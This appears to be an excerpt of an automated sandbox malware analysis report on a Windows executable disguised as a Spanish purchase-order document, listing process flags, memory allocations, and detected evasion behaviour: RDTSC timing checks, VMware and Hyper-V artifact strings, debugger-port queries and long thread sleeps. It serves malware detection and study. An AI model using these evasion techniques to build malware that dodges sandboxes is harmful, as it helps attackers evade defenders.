Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Solicitud de pedido Documento No 168646080.exe PID: 3180, type: MEMORYSTR

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Memory allocated: BF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Memory allocated: 2710000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Memory allocated: 4710000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Memory allocated: 8B10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Memory allocated: 74B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Memory allocated: 9B10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Memory allocated: AB10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Memory allocated: AF30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Memory allocated: BF30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Memory allocated: CF30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Memory allocated: E020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Memory allocated: F020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Memory allocated: 10020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Memory allocated: 11020000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe

Code function: 6_2_00409AA0 rdtsc

6_2_00409AA0

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4566	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2404	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 5542	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3702	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 887	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 868	Jump to behavior

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	API coverage: 1.7 %
Source: C:\Windows\SysWOW64\msiexec.exe	API coverage: 1.7 %

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe TID: 4636	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7468	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7456	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7900	Thread sleep count: 5542 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7900	Thread sleep time: -11084000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7900	Thread sleep count: 3702 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7900	Thread sleep time: -7404000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7848	Thread sleep count: 181 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7848	Thread sleep time: -362000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7848	Thread sleep count: 9790 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7848	Thread sleep time: -19580000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: explorer.exe, 00000007.00000002.3782175629.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
Source: explorer.exe, 00000007.00000000.1397939438.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000007.00000002.3797149522.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Solicitud de pedido Documento No 168646080.exe, 00000002.00000002.1393720421.0000000000CB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000007.00000000.1404737205.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3797149522.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000007.00000000.1397939438.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
Source: explorer.exe, 00000007.00000000.1397939438.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
Source: explorer.exe, 00000007.00000003.3076068308.000000000901E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000007.00000000.1397939438.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000007.00000003.2271828334.0000000007306000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_xU1
Source: explorer.exe, 00000007.00000002.3797149522.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 00000007.00000002.3797149522.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
Source: explorer.exe, 00000007.00000002.3798409790.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
Source: explorer.exe, 00000007.00000002.3797149522.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000007.00000000.1404737205.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3797149522.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
Source: explorer.exe, 00000007.00000000.1397939438.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware20,1
Source: explorer.exe, 00000007.00000000.1397939438.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: explorer.exe, 00000007.00000002.3797149522.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMWare
Source: explorer.exe, 00000007.00000002.3798409790.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
Source: explorer.exe, 00000007.00000003.2271828334.0000000007306000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000007.00000000.1404737205.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3797149522.0000000008F27000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWT`
Source: explorer.exe, 00000007.00000000.1397939438.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIES1371
Source: explorer.exe, 00000007.00000000.1397939438.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM
Source: explorer.exe, 00000007.00000000.1397939438.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: explorer.exe, 00000007.00000002.3782175629.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000007.00000002.3797149522.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000002.3782175629.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe

Code function: 6_2_00409AA0 rdtsc

6_2_00409AA0

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe

Code function: 6_2_0040ACE0 LdrLoadDll,

6_2_0040ACE0

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016F4144 mov eax, dword ptr fs:[00000030h]	6_2_016F4144
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016F4144 mov eax, dword ptr fs:[00000030h]	6_2_016F4144
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016F4144 mov ecx, dword ptr fs:[00000030h]	6_2_016F4144
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016F4144 mov eax, dword ptr fs:[00000030h]	6_2_016F4144
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016F4144 mov eax, dword ptr fs:[00000030h]	6_2_016F4144
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01666154 mov eax, dword ptr fs:[00000030h]	6_2_01666154
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01666154 mov eax, dword ptr fs:[00000030h]	6_2_01666154
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0165C156 mov eax, dword ptr fs:[00000030h]	6_2_0165C156
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016F8158 mov eax, dword ptr fs:[00000030h]	6_2_016F8158
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01690124 mov eax, dword ptr fs:[00000030h]	6_2_01690124
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01720115 mov eax, dword ptr fs:[00000030h]	6_2_01720115
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170A118 mov ecx, dword ptr fs:[00000030h]	6_2_0170A118
